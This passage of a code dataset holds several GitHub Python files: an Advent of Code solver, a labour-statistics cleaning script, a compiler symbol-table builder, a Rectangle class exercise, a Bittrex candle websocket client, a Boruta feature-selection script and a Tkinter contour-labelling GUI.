😅\")\n\ncombate(BitBee,RockerTu)","repo_name":"Usernamek-dot/Python-course","sub_path":"sampleGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"11896642488","text":"import itertools\nimport math\n\n\ndef find_sum_set(values, expected_sum, n_elements):\n    \"\"\"\n    Given a list of values, returns the product of the first n_elements found\n    that sum expected_sum\n    \"\"\"\n    for pick in itertools.combinations(values, n_elements):\n        if (sum(pick)) == expected_sum:\n            return math.prod(pick)\n\n\nif __name__ == \"__main__\":\n    values = []\n    with open(\"../data/01.txt\") as fi:\n        values = [int(v) for v in fi.readlines()]\n\n    result_1 = find_sum_set(values, 2020, 2)\n    print(result_1)\n\n    result_2 = find_sum_set(values, 2020, 3)\n    print(result_2)\n","repo_name":"cnluzon/advent-of-code","sub_path":"src/01_report_repair.py","file_name":"01_report_repair.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"16240459957","text":"import pandas as pd\nimport os\n\n# multiple-use variables\nwz_taxonomy = pd.read_excel('../data/taxonomy/wz2008_taxonomy.xlsx', converters={'wz2008_code':str}) # file with codes and labels to serve as basis\nkldb_taxonomy = pd.read_excel('../data/taxonomy/kldb2010_taxonomy.xlsx', converters={'kldb2010_code':str, 'kldb2010_bereich_code':str}) # file with codes and labels to serve as basis\nregion_codes = ['d', '01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12', '13', '14', '15', '16'] # regions to be included in data processing\ndirectories_list = ['../data/raw/wz', '../data/raw/kldb']\n\n#%%\n\n'''\nBeschäftigte (SVB and GB)\n\nWHAT THIS PROCESS DOES:\nReads the files downloaded from the website of the Bundesagentur für 
Arbeit,\nreturns a new, cleaned file for every file read.\n\nREQUIREMENTS to run without errors or changes: \n 1. the original file naming system from the BA must be retained (e.g. wz-heft-d-0-202003-xlsx.xlsx)\n 2. the files must be located under /data/raw/wz or /data/raw/kldb\n'''\n\nfrom data_cleaning_functions import clean_besch_data_tabelleII\n\nvariables_list = ['SVB', 'GB'] # employment types to be included in the process (case sensitive)\n\nfor directory in directories_list:\n for filename in os.listdir(directory): # iterates through filenames in each directory\n if (filename.startswith('wz-heft-') or filename.startswith('bo-heft-')): # avoid reading irrelevant files\n for variable in variables_list:\n \n # read and clean file\n df = pd.read_excel(f'{directory}/{filename}', sheet_name=f'{variable} - Tabelle II') \n \n # define new filename length according to region\n if '-d-' in filename or '-w-' in filename or '-o-' in filename:\n name_length = 18\n else:\n name_length = 19\n \n # clean and export files\n if 'wz' in filename:\n df_cleaned = clean_besch_data_tabelleII(df, variable, 'wz')\n new_filename = f'{filename[:name_length]}_{str.lower(variable)}_tabelle2.csv'\n df_cleaned.to_csv(f'../data/processing/wz/{new_filename}', index=False) \n print(f'Exported: {new_filename} to data/processing/wz')\n \n elif 'bo' in filename:\n df_cleaned = clean_besch_data_tabelleII(df, variable, 'kldb')\n new_filename = f'kldb-{filename[3:name_length]}_{str.lower(variable)}_tabelle2.csv'\n df_cleaned.to_csv(f'../data/processing/kldb/{new_filename}', index=False) \n print(f'Exported: {new_filename} to data/processing/kldb')\n\n else:\n print('File not cleaned or exported')\n \n\n#%%\n\n'''\nBegonnene sozialversicherungspflichtige Beschäftigungsverhältnisse\n\nWHAT THIS PROCESS DOES:\nReads the files acquired from the Bundesagentur für Arbeit,\nreturns a new, cleaned file for every file read.\n\nREQUIREMENTS to run without errors or changes: \n 1. the original 'standard' table formatting of the BA must be retained (i.e. contents of the excel file acquired from the BA must not be altered)\n 2. the file name must be: {stat_type}_{region}_begBesch (e.g. wz_d_begBesch.xlsx)\n 3. the sheet name containing the data in the files must be: Beg.BV_Svpfl_WZ2008 (for WZ) or Beg.BV_Svpfl_KldB2010 (for KldB)\n 4. the files must be located under /data/raw/wz or /data/raw/kldb\n \n Alternatively, an already cleaned version of the file can be placed in data/processing with the following requirements:\n Name of the file: {stat_type}_{region}_begBesch.csv (e.g. 
kldb_08_begBesch.csv or wz_d_begBesch.csv)\n Name of the column containing the WZ or KldB codes: wz2008_code or kldb2010_code\n'''\n\nfrom data_cleaning_functions import clean_begBesch_data\n\n\nfor directory in directories_list:\n for filename in os.listdir(directory): # iterates through filenames in each directory\n for region in region_codes:\n if f'{region}_begBesch' in filename: # avoid reading irrelevant files\n \n if 'wz' in filename:\n df_master = pd.read_excel(f'{directory}/{filename}', sheet_name='Beg.BV_Svpfl_WZ2008')\n \n # clean the dataframe\n df = clean_begBesch_data(df_master.copy(), 'wz')\n \n # add taxonomy information and merge\n df_base = wz_taxonomy.copy()\n df_base = df_base['wz2008_code']\n df = df.merge(df_base, on='wz2008_code', how='left')\n \n # export new file\n new_filename = f'wz_{region}_begBesch.csv'\n df.to_csv(f'../data/processing/wz/{new_filename}', index=False)\n print(f'Exported: {new_filename} to data/processing/wz')\n \n if 'kldb' in filename:\n df_master = pd.read_excel(f'{directory}/{filename}', sheet_name='Beg.BV_Svpfl_KldB2010')\n \n # clean the dataframe\n df = clean_begBesch_data(df_master.copy(), 'kldb')\n \n # add taxonomy information and merge\n df_base = kldb_taxonomy.copy()\n df_base = df_base['kldb2010_code']\n df = df.merge(df_base, on='kldb2010_code', how='left')\n \n # export new file\n new_filename = f'kldb_{region}_begBesch.csv'\n df.to_csv(f'../data/processing/kldb/{new_filename}', index=False)\n print(f'Exported: {new_filename} to data/processing/kldb')\n\n\n#%%\n\n'''\nOnline Job Vacancies\n\nWHAT THIS PROCESS DOES:\nReads and cleans a single file containing the data,\nreturns unified file with ojv count by all WZ levels.\n\nREQUIREMENTS to run without errors or changes:\n 1. the file name must be: {stat_type}_{region}_ojv (e.g. wz_d_ojv.csv)\n 2. the column name must be either: wz2008_code or kldb2010_code\n 3. 
the files must be located under /data/raw/wz or /data/raw/kldb\n'''\n\nfrom data_cleaning_functions import clean_codes\n\nfor directory in directories_list:\n    for filename in os.listdir(directory): # iterates through filenames in each directory\n        for region in region_codes:\n            if f'{region}_ojv' in filename: # avoid reading irrelevant files\n                \n                if 'wz' in filename:\n                    df_base = wz_taxonomy.copy() # import taxonomy file\n                    stat_type = 'wz'\n                    code = 'wz2008_code'\n                    \n                if 'kldb' in filename:\n                    df_base = kldb_taxonomy.copy() # import taxonomy file\n                    stat_type = 'kldb'\n                    code = 'kldb2010_code'\n                \n                # read file with ojv data\n                if (filename.endswith('xlsx')) | (filename.endswith('xls')):\n                    df_ojv = pd.read_excel(f'../data/raw/{stat_type}/{filename}')\n                elif filename.endswith('csv'):\n                    df_ojv = pd.read_csv(f'../data/raw/{stat_type}/{filename}')\n                \n                \n                # create dataframe for each steller \n                df2 = clean_codes(df_ojv.copy(), '2steller', stat_type)\n                df3 = clean_codes(df_ojv.copy(), '3steller', stat_type)\n                df4 = clean_codes(df_ojv.copy(), '4steller', stat_type)\n                df5 = clean_codes(df_ojv.copy(), '5steller', stat_type)\n                \n                # append them to get single dataframe\n                df_all = df2.append(df3)\n                df_all = df_all.append(df4)\n                df_all = df_all.append(df5)\n                \n                # merge to base dataframe\n                df = df_base.merge(df_all, on=code, how='left')\n                df = df.groupby([code, 'year'], as_index=False).sum()\n                \n                # export to file\n                new_filename = f'{stat_type}_{region}_ojv.csv'\n                df.to_csv(f'../data/processing/{stat_type}/{new_filename}', index=False)\n                print(f'Exported: {new_filename} to data/processing')","repo_name":"bertelsmannstift/OJV-distribution-analyses","sub_path":"src/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"41146747538","text":"from Project.Lib3_Grammer.main import *\nfrom Tables import *\n\n\n\"\"\"\n1. Declaring a variable without assigning it creates redundant entries; de-duplicate the dict\n2. Variable scope\n3. Constants must always be assigned, so redundancy is not a concern there\n\"\"\"\n\n\nregulation = '../Lib3_Grammer/test1'\ncontent = read_file('../Lib3_Grammer/Token/target.reg')\ntree, _ = entry(content, regulation)\nprint(tree.show(key=False))\nd = tree.to_dict(sort=False)\n\n\n\"\"\"div\"\"\"\n\na = {}\nb = {}\nres = []\ncon_res = []\nfun_res = []\n\n\ndef var_type(tree, root, obj, start):\n    typ = tree[root]['children'][0]\n    obj[1] = typ\n\n\ndef var(tree, root, obj, start):\n    name = tree[root]['children'][0]\n    obj[2] = name\n    if obj[2] not in b:\n        b[obj[2]] = []\n    b[obj[2]].append(obj[:])\n\n\ndef var_val(tree, root, obj, start):\n    val = tree[root]['children'][0]\n    obj[3] = val\n    res.append(obj[:])\n    if obj[2] not in b:\n        b[obj[2]] = []\n    b[obj[2]].append(obj[:])\n    obj[3] = ''\n    start[0] += 1\n    obj[0] = start[0]\n\n\ndef global_var_declare(tree, root, obj, start):\n    child = tree[root]['children']\n    for c in child:\n        if isinstance(c, dict):\n            for k, _ in c.items():\n                if k == 'var_type':\n                    var_type(c, k, obj, start)\n                elif k == 'var':\n                    var(c, k, obj, start)\n                elif k == 'con':\n                    var_val(c, k, obj, start)\n                else:\n                    global_var_declare(c, k, obj, start)\n\n\ndef var_declare(tree, root, obj, start):\n    child = tree[root]['children']\n    for c in child:\n        if isinstance(c, dict):\n            for k, _ in c.items():\n                if k == 'var_type':\n                    var_type(c, k, obj, start)\n                elif k == 'var':\n                    var(c, k, obj, start)\n                elif k == 'con':\n                    var_val(c, k, obj, start)\n                else:\n                    var_declare(c, k, obj, start)\n\n\ndef con_type(tree, root, obj, start):\n    typ = tree[root]['children'][0]\n    obj[1] = typ\n\n\ndef 
con_declare_list(tree, root, obj, start):\n child = tree[root]['children']\n obj[2] = child[0]\n obj[3] = child[1]['con']['children'][0]\n if obj[2] not in a:\n a[obj[2]] = []\n a[obj[2]].append(obj[:])\n # con_res.append(obj[:])\n\n\ndef con_declare(tree, root, obj, start):\n child = tree[root]['children']\n for c in child:\n if isinstance(c, dict):\n for k, _ in c.items():\n if k == 'con_type':\n con_type(c, k, obj, start)\n elif k == 'con_declare_list':\n con_declare_list(c, k, obj, start)\n else:\n con_declare(c, k, obj, start)\n\n\ndef fun_type(tree, root, obj, start):\n typ = tree[root]['children'][0]\n obj.append(typ)\n\n\ndef fun_declare_fpar(tree, root, obj, start, par):\n child = tree[root]['children']\n for c in child:\n if isinstance(c, dict):\n for k, _ in c.items():\n if k == 'var_type':\n item = c[k]['children'][0]\n par.append(item)\n else:\n fun_declare_fpar(c, k, obj, start, par)\n\n\ndef fun_declare(tree, root, obj, start):\n child = tree[root]['children']\n for c in child:\n if isinstance(c, dict):\n for k, _ in c.items():\n if k == 'fun_type':\n fun_type(c, k, obj, start)\n elif k == 'fun_declare_fpar':\n par = []\n fun_declare_fpar(c, k, obj, start, par)\n obj.append(str(len(par)))\n for i in par:\n obj.append(i)\n fun_res.append(obj[:])\n else:\n fun_declare(c, k, obj, start)\n\n\nroot = 'program'\n\n\ndef create_sign_table(tree, root, start=[1]):\n child = tree[root]['children']\n for c in child:\n for k, _ in c.items():\n\n if k == 'global_var_declare':\n t = c[k]['children'][0]\n s = c[k]['children'][1]\n obj = [start[0], t, s, '']\n global_var_declare(c, k, obj, start)\n pass\n elif k == 'fun_declare':\n s = c[k]['children'][1]\n obj = [start[0], s]\n fun_declare(c, k, obj, start)\n elif k == 'var_declare':\n obj = [start[0], '', '', '']\n var_declare(c, k, obj, start)\n elif k == 'con_declare':\n obj = [start[0], '', '', '']\n con_declare(c, k, obj, start)\n else:\n create_sign_table(c, k)\n # print(len(child))\n pass\n\n\ncreate_sign_table(d, root)\nprint(res)\nprint(a)\nprint(b)\nprint(fun_res)","repo_name":"Miooo00/CompilationPrinciple","sub_path":"Project/Lib4_Semantic_Analyse/signs.py","file_name":"signs.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16061825038","text":"#!/usr/bin/python3\n\"\"\"Defines rectangle class\"\"\"\n\n\nclass Rectangle:\n\n \"\"\"\n Class that defines properties\n\n Attributes:\n width (int): width\n height (int): height\n \"\"\"\n\n number_of_instances = 0\n print_symbol = \"#\"\n\n def __init__(self, width=0, height=0):\n\n \"\"\"Creates new instances\n\n Args:\n width (int, optional): width\n height (int, optional): height\n \"\"\"\n\n self.height = height\n self.width = width\n type(self).number_of_instances += 1\n\n @property\n def width(self):\n\n \"\"\"Width getter\n\n Returns:\n int: the width\n \"\"\"\n\n return self.__width\n\n @property\n def height(self):\n \"\"\"Height getter\n\n Returns:\n int: the height.\n \"\"\"\n\n return self.__height\n\n @width.setter\n def width(self, value):\n\n \"\"\"setter for width\n\n Args:\n value (int): width\n\n Raises:\n TypeError: if width not an integer.\n ValueError: if width < 0.\n \"\"\"\n\n if not isinstance(value, int):\n raise TypeError(\"width must be an integer\")\n elif value < 0:\n\n raise ValueError(\"width must be >= 0\")\n else:\n self.__width = value\n\n @height.setter\n def height(self, value):\n\n \"\"\"setter for height\n\n Args:\n value (int): height\n\n 
Raises:\n TypeError: if height not an integer.\n ValueError: if height < 0.\n \"\"\"\n\n if not isinstance(value, int):\n raise TypeError(\"height must be an integer\")\n elif value < 0:\n\n raise ValueError(\"height must be >= 0\")\n else:\n self.__height = value\n\n def area(self):\n \"\"\"Calculates area\n\n Returns:\n int: area.\n \"\"\"\n return self.__height * self.__width\n\n def perimeter(self):\n \"\"\"Calculates perimeter\n\n Returns:\n int: perimeter.\n \"\"\"\n\n if self.__height == 0 or self.width == 0:\n return 0\n else:\n\n return 2 * (self.__height + self.__width)\n\n def __str__(self):\n \"\"\"Prints with the character # .\n\n Returns:\n str: rectangle\n \"\"\"\n\n rectangle = []\n\n if self.__width == 0 or self.__height == 0:\n return \"\"\n\n for i in range(self.__height):\n\n for j in range(self.__width):\n\n rectangle.append(str(self.print_symbol))\n rectangle.append(\"\\n\")\n\n # remove blank line\n rectangle.pop()\n\n return \"\".join(rectangle)\n\n def __repr__(self):\n \"\"\" a string\n\n Returns:\n str: rectangle string\n \"\"\"\n return \"Rectangle({:d}, {:d})\".format(self.__width, self.__height)\n\n def __del__(self):\n \"\"\"Deletes instances\n \"\"\"\n print(\"{:s}\".format(\"Bye rectangle...\"))\n type(self).number_of_instances -= 1\n\n @staticmethod\n def bigger_or_equal(rect_1, rect_2):\n\n \"\"\"Computes the area of two rectangles\n\n Args:\n rect_1 (Rectangle): rectangle 1.\n rect_2 (Rectangle): rectangle 2.\n\n Returns:\n Rectangle: the rectangle with the biggest area\n \"\"\"\n\n if not isinstance(rect_1, Rectangle):\n raise TypeError(\"rect_1 must be an instance of Rectangle\")\n\n if not isinstance(rect_2, Rectangle):\n raise TypeError(\"rect_2 must be an instance of Rectangle\")\n\n area_1 = rect_1.area()\n area_2 = rect_2.area()\n\n if area_1 >= area_2:\n return rect_1\n\n return rect_2\n","repo_name":"youssef665/alx-higher_level_programming","sub_path":"0x08-python-more_classes/8-rectangle.py","file_name":"8-rectangle.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42075155402","text":"import traceback\nfrom time import sleep, time\nfrom dateutil.parser import parse\nfrom BL.Exchanges.Bittrex.WebsocketClientLib.websocket_client import BittrexSocket\nfrom Common.Exchange.Candle import Candle\n\n\ndef convert_to_streams(symbols, interval):\n\ttry:\n\t\tif interval == \"1m\":\n\t\t\tinterval_str = \"MINUTE_1\"\n\t\telif interval == \"5m\":\n\t\t\tinterval_str = \"MINUTE_5\"\n\t\telif interval == \"1h\":\n\t\t\tinterval_str = \"HOUR_1\"\n\t\telif interval == \"1d\":\n\t\t\tinterval_str = \"DAY_1\"\n\t\telse:\n\t\t\treturn []\n\t\tstreams = [\"candle_\" + symbol + \"_\" + interval_str for symbol in symbols]\n\t\treturn streams\n\texcept:\n\t\tprint(traceback.format_exc())\n\n\nclass BittrexWebSocket(BittrexSocket):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.callback = None\n\n\tdef exit(self):\n\t\tself.stop()\n\n\tdef start(self, symbols, interval, callback):\n\t\tsuper().start()\n\n\t\tself.callback = callback\n\t\tstreams = convert_to_streams(symbols, interval)\n\t\t# self.subscribe_to_heartbeat()\n\n\t\t# Subscribe to ticker information\n\t\t# Users can also subscribe without introducing delays during invoking but\n\t\t# it is the recommended way when you are subscribing to a large list of tickers.\n\t\tfor stream in streams:\n\t\t\tsleep(0.01)\n\t\t\tself.subscribe_to_candles([stream])\n\t\t# 
self.subscribe_to_candles(streams)\n\n\tdef stop(self):\n\t\tself.disconnect()\n\n\t# where I receive the messages\n\tasync def on_public(self, msg):\n\t\tif msg[\"invoke_type\"] == \"heartbeat\":\n\t\t\tprint('\\u2661')\n\t\telif msg[\"invoke_type\"] == \"candle\":\n\t\t\t# print(msg)\n\n\t\t\tevent_time_ms = int(time()*1000) #msec\n\t\t\titem = msg['delta']\n\t\t\topen_time_ms = int(parse(item[\"startsAt\"]).timestamp() * 1000) # store as milliseconds\n\n\t\t\tsec_in_ms = 1000\n\t\t\tmin_in_ms = 60 * sec_in_ms\n\t\t\thour_in_ms = 60 * min_in_ms\n\t\t\tday_in_ms = 24 * hour_in_ms\n\n\t\t\tclose_time_ms = 0\n\t\t\tis_closed = False\n\t\t\tinterval = \"\"\n\t\t\tif msg['interval'] == \"MINUTE_1\":\n\t\t\t\tinterval = \"1m\"\n\t\t\t\tclose_time_ms = open_time_ms + min_in_ms\n\t\t\telif msg['interval'] == \"MINUTE_5\":\n\t\t\t\tinterval = \"5m\"\n\t\t\t\tclose_time_ms = open_time_ms + 5*min_in_ms\n\t\t\telif msg['interval'] == \"HOUR_1\":\n\t\t\t\tinterval = \"1h\"\n\t\t\t\tclose_time_ms = open_time_ms + hour_in_ms\n\t\t\telif msg['interval'] == \"DAY_1\":\n\t\t\t\tinterval = \"1d\"\n\t\t\t\tclose_time_ms = open_time_ms + day_in_ms\n\n\t\t\tif 0 < close_time_ms <= event_time_ms:\n\t\t\t\tis_closed = True\n\n\t\t\tcandle = Candle(symbol=msg['marketSymbol'],\n\t\t\t\t\t\t\tinterval=interval,\n\t\t\t\t\t\t\topen_time=open_time_ms,\n\t\t\t\t\t\t\tclose_time=close_time_ms,\n\t\t\t\t\t\t\topen=item[\"open\"],\n\t\t\t\t\t\t\thigh=item[\"high\"],\n\t\t\t\t\t\t\tlow=item[\"low\"],\n\t\t\t\t\t\t\tclose=item[\"close\"],\n\t\t\t\t\t\t\tvolume=item[\"volume\"],\n\t\t\t\t\t\t\tquote_asset_volume=item[\"quoteVolume\"],\n\t\t\t\t\t\t\tis_closed=is_closed)\n\t\t\tself.callback(candle, event_time_ms)\n\n\t\telif msg[\"invoke_type\"] == \"trade\":\n\t\t\tprint(msg)\n\n\n","repo_name":"Senior-Develop/SWT-PYQT-APP","sub_path":"BL/Exchanges/Bittrex/BittrexWebSocket.py","file_name":"BittrexWebSocket.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23668908409","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport time\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (12., 6.)\nimport seaborn as sns\nsns.set()\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.metrics import roc_auc_score\n\nfrom boruta import boruta_py\n\n\nclass ExecutionTime:\n    ''' Usage:\n        timer = ExecutionTime()\n        print('Finished in {:0.2f} minutes.'.format(timer.duration()/60))\n    '''\n    def __init__(self):\n        self.start_time = time.time()\n\n    def duration(self):\n        return time.time() - self.start_time\n\n\n\nX = pd.read_csv('../input/trainItem_w_features_2.csv')\nX.drop(['itemID_1', 'itemID_2', 'generationMethod'], axis=1, inplace=True)\n\ny = X.pop('isDuplicate')\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, stratify=y, random_state=27)\n\n\nclf = RandomForestClassifier(n_jobs=10, max_depth=5, class_weight='auto')\n\nfeat_selector = boruta_py.BorutaPy(clf, n_estimators=1000, verbose=2)\n\n# find all relevant features\ntimer = ExecutionTime()\nfeat_selector.fit(X.values, y.values)\nprint('Finished in {:0.2f} minutes.'.format(timer.duration()/60))\n\n# check selected features\ngood_feats = X.columns[feat_selector.support_].tolist()\nprint(good_feats)\n\n\n# check ranking of features\nfeat_selector.ranking_\n\n\n\nclf = 
RandomForestClassifier(n_estimators=1000, n_jobs=10, max_depth=9, class_weight='auto')\n\nclf.fit(X_train, y_train)\ny_pred = clf.predict_proba(X_test)[:,1]\nscore = roc_auc_score(y_test, y_pred)\nprint(' All feats: {:0.5f}'.format(score))\n\n\nclf.fit(X_train[good_feats], y_train)\ny_pred = clf.predict_proba(X_test[good_feats])[:,1]\nscore = roc_auc_score(y_test, y_pred)\nprint('Good feats: {:0.5f}'.format(score))\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ThakurRajAnand/Avito2016","sub_path":"Python/boruta_feature_importance.py","file_name":"boruta_feature_importance.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70706835433","text":"\nimport sys\nimport tkinter as tk\nimport shutil\nfrom typing import Text\nimport numpy as np\nimport os\nimport pathlib\nimport PIL\nimport cv2\n\nfrom functools import partial\nfrom tkinter import PhotoImage, messagebox as mbox\nfrom PIL import Image\nfrom PIL import ImageTk\nfrom tkinter import filedialog\nfrom osgeo import gdal,ogr,osr\nfrom neural import NeuralFunctions as nf\n\nclass Interface(tk.Frame):\n\n def __init__(self, root):\n\n tk.Frame.__init__(self, root)\n menubar = tk.Menu(self)\n fileMenu = tk.Menu(self)\n \n self.width_size = 800\n self.hight_size = 600\n self.x_crop = 0\n self.y_crop = 0\n self.iterator_x = 256\n self.iterator_y = 256\n self.iterator_recoil = 0.8\n self.cnt_validator = []\n self.background_percent = 0.8\n self.array_clicks = []\n self.draw_lines_array = [[]]\n self.save_draw_array = None\n self.name_tif = ''\n self.name_reference_binary = ''\n self.name_reference_neural = ''\n self.slider_pencil = 10\n self.option_draw = True\n self.bool_draw = False\n self.path_save_img_rgb = 'dataset/rgb'\n self.path_save_img_bin = 'dataset/binario'\n root.maxsize(self.width_size, self.hight_size) \n root.resizable(False,False)\n\n self.f = {\"Back\":\"0\", \"Next\":\"1\"}\n self.first_click = False\n self.first_click_bool = False\n self.ready_start = False\n\n self.change_button = {}\n self.bool_value = tk.StringVar() # Necessario ser como string para funcionar\n self.spn_box_1 = tk.StringVar()\n self.spn_box_2 = tk.StringVar()\n self.spn_box_3 = tk.StringVar()\n self.current_value = tk.DoubleVar()\n self.btn_int = tk.IntVar()\n\n self.var = tk.IntVar()\n self.old_choose = '' \n self.OptionList = [\"Compare Results\",\n \"Draw Weeds\"] \n\n img = ImageTk.PhotoImage(file='icons/icone_sensix.png')\n print(img)\n root.call('wm', 'iconphoto', root._w, img)\n\n self.event2canvas = lambda e, c: (c.canvasx(e.x), c.canvasy(e.y ))\n menubar.add_cascade(label=\"File\", menu=fileMenu)\n fileMenu.add_cascade(label=\"Draw\", command=self.select_image)\n fileMenu.add_cascade(label=\"Choose Neural Network\", command=self.select_image)\n\n def start(self):\n _bgcolor = '#d9d9d9' # X11 color: 'gray85'\n _fgcolor = '#000000' # X11 color: 'black'\n _compcolor = '#d9d9d9' # X11 color: 'gray85'\n _ana1color = '#d9d9d9' # X11 color: 'gray85'\n _ana2color = '#ececec' # Closest X11 color: 'gray92'\n self.style = tk.Style()\n if sys.platform == \"win32\":\n self.style.theme_use('winnative')\n self.style.configure('.',background=_bgcolor)\n self.style.configure('.',foreground=_fgcolor)\n self.style.configure('.',font=\"TkDefaultFont\")\n self.style.map('.',background=\n [('selected', _compcolor), ('active',_ana2color)])\n\n root.geometry(\"527x505+400+200\")\n root.minsize(1, 1)\n root.maxsize(1351, 738)\n root.resizable(1, 1)\n root.title(\"Comparador de 
Contornos\")\n root.configure(highlightcolor=\"black\")\n\n self.TSeparator1 = tk.Separator(root)\n self.TSeparator1.place(relx=0.021, rely=0.535, relwidth=0.962)\n\n self.menubar = tk.Menu(root,font=\"TkMenuFont\",bg=_bgcolor,fg=_fgcolor)\n root.configure(menu = self.menubar)\n\n self.Scale1 = tk.Scale(root, from_=0.0, to=100.0)\n self.Scale1.place(relx=0.417, rely=0.044, relheight=0.5\n , relwidth=0.173)\n self.Scale1.configure(orient=\"horizontal\")\n self.Scale1.configure(troughcolor=\"#000000\")\n\n self.btn_load_mosaico = tk.Button(root)\n self.btn_load_mosaico.place(relx=0.74, rely=0.572, height=28, width=123)\n self.btn_load_mosaico.configure(takefocus=\"\")\n self.btn_load_mosaico.configure(text='Mosaico')\n self.btn_load_mosaico.bind('', partial(self.get_btn, key=\"0\"))\n\n self.btn_shape_reference = tk.Button(root)\n self.btn_shape_reference.place(relx=0.74, rely=0.659, height=28, width=123)\n self.btn_shape_reference.configure(takefocus=\"\")\n self.btn_shape_reference.configure(text='Shape de Refer')\n self.btn_shape_reference.bind('', partial(self.get_btn, key=\"1\"))\n\n self.btn_shape_neural = tk.Button(root)\n self.btn_shape_neural.place(relx=0.74, rely=0.747, height=28, width=123)\n self.btn_shape_neural.configure(takefocus=\"\")\n self.btn_shape_neural.configure(text='Shape da Rede')\n self.btn_shape_neural.bind('', partial(self.get_btn, key=\"2\"))\n\n self.btn_start = tk.Button(root)\n self.btn_start.place(relx=0.742, rely=0.871, height=48, width=123)\n self.btn_start.configure(takefocus=\"\")\n self.btn_start.configure(text='Iniciar')\n self.btn_start.bind('', partial(self.get_btn, key=\"5\"))\n\n self.spinbox1 = tk.Spinbox(root, from_=10.0, to=800.0, increment=10, textvariable=self.spn_box_1)\n self.spinbox1.place(relx=0.74, rely=0.178, relheight=0.046, relwidth=0.243)\n self.spinbox1.configure(activebackground=\"#f9f9f9\")\n self.spinbox1.configure(background=\"white\")\n self.spinbox1.configure(font=\"TkDefaultFont\")\n self.spinbox1.configure(highlightbackground=\"black\")\n self.spinbox1.configure(selectbackground=\"blue\")\n self.spinbox1.configure(selectforeground=\"white\")\n self.spinbox1.configure(command=self.get_values_spinbox)\n\n self.spinbox2 = tk.Spinbox(root, from_=100.0, to=800.0, increment=100, textvariable=self.spn_box_2)\n self.spinbox2.place(relx=0.74, rely=0.271, relheight=0.046\n , relwidth=0.243)\n self.spinbox2.configure(activebackground=\"#f9f9f9\")\n self.spinbox2.configure(background=\"white\")\n self.spinbox2.configure(font=\"TkDefaultFont\")\n self.spinbox2.configure(highlightbackground=\"black\")\n self.spinbox2.configure(selectbackground=\"blue\")\n self.spinbox2.configure(selectforeground=\"white\")\n self.spinbox2.configure(command=self.get_values_spinbox)\n\n self.spinbox3 = tk.Spinbox(root, from_=100.0, to=800.0, increment=100, textvariable=self.spn_box_3)\n self.spinbox3.place(relx=0.74, rely=0.364, relheight=0.046, relwidth=0.243)\n self.spinbox3.configure(activebackground=\"#f9f9f9\")\n self.spinbox3.configure(background=\"white\")\n self.spinbox3.configure(font=\"TkDefaultFont\")\n self.spinbox3.configure(highlightbackground=\"black\")\n self.spinbox3.configure(selectbackground=\"blue\")\n self.spinbox3.configure(selectforeground=\"white\")\n self.spinbox3.configure(command=self.get_values_spinbox)\n \n \n self.label1 = tk.Label(root)\n self.label1.place(relx=0.015, rely=0.178, height=21, width=245)\n self.label1.configure(activebackground=\"#f9f9f9\")\n self.label1.configure(text='Escolha a porcentagem de iteração :')\n\n 
self.Radiobutton1 = tk.Radiobutton(root)\n self.Radiobutton1.place(relx=0.721, rely=0.455, relheight=0.046\n , relwidth=0.132)\n self.Radiobutton1.configure(justify='left')\n self.Radiobutton1.configure(text='Padrão', value=True, variable=self.bool_value, command=self.get_values_radio,)\n\n self.label2 = tk.Label(root)\n self.label2.place(relx=0.021, rely=0.269, height=21, width=235)\n self.label2.configure(text='Valor do comprimento da imagem :')\n\n self.label3 = tk.Label(root)\n self.label3.place(relx=0.021, rely=0.36, height=21, width=186)\n self.label3.configure(text='Valor de altura da imagem :')\n\n self.label4 = tk.Label(root)\n self.label4.place(relx=0.014, rely=0.446, height=21, width=186)\n self.label4.configure(text='Usar configuração padrão :')\n\n self.label5 = tk.Label(root)\n self.label5.place(relx=0.023, rely=0.58, height=21, width=138)\n self.label5.configure(text='Selecionar Mosaico :')\n\n self.label6 = tk.Label(root)\n self.label6.place(relx=0.019, rely=0.66, height=21, width=213)\n self.label6.configure(text='Selecionar shape de referencia :')\n\n self.label7 = tk.Label(root)\n self.label7.place(relx=0.019, rely=0.74, height=38, width=221)\n self.label7.configure(text='Selecionar shape da rede neural :')\n\n def labelling_start(self):\n root.minsize(1100, 700)\n #root.maxsize(1351, 738)\n root.resizable(1, 1)\n root.title(\"New rootlevel\")\n\n self.value_label = tk.Label(root, text=self.get_current_value())\n '''\n self.Scale1 = tk.Scale(root, tickinterval=10, from_=0.0, to=100.0)\n self.Scale1.place(relx=0.60, rely=0.85, relheight=0.093\n , relwidth=0.271)\n self.Scale1.configure(length=\"251\")\n self.Scale1.configure(orient=\"horizontal\")\n self.Scale1.configure(troughcolor=\"#d9d9d9\")\n\n '''\n self.Scale2 = tk.Scale(root, tickinterval=5, from_=10.0, to=50.0, command=self.slider_changed, variable=self.current_value)\n self.Scale2.place(relx=0.132, rely=0.88, relheight=0.093, relwidth=0.271)\n self.Scale2.configure(length=\"249\")\n self.Scale2.configure(orient=\"horizontal\")\n 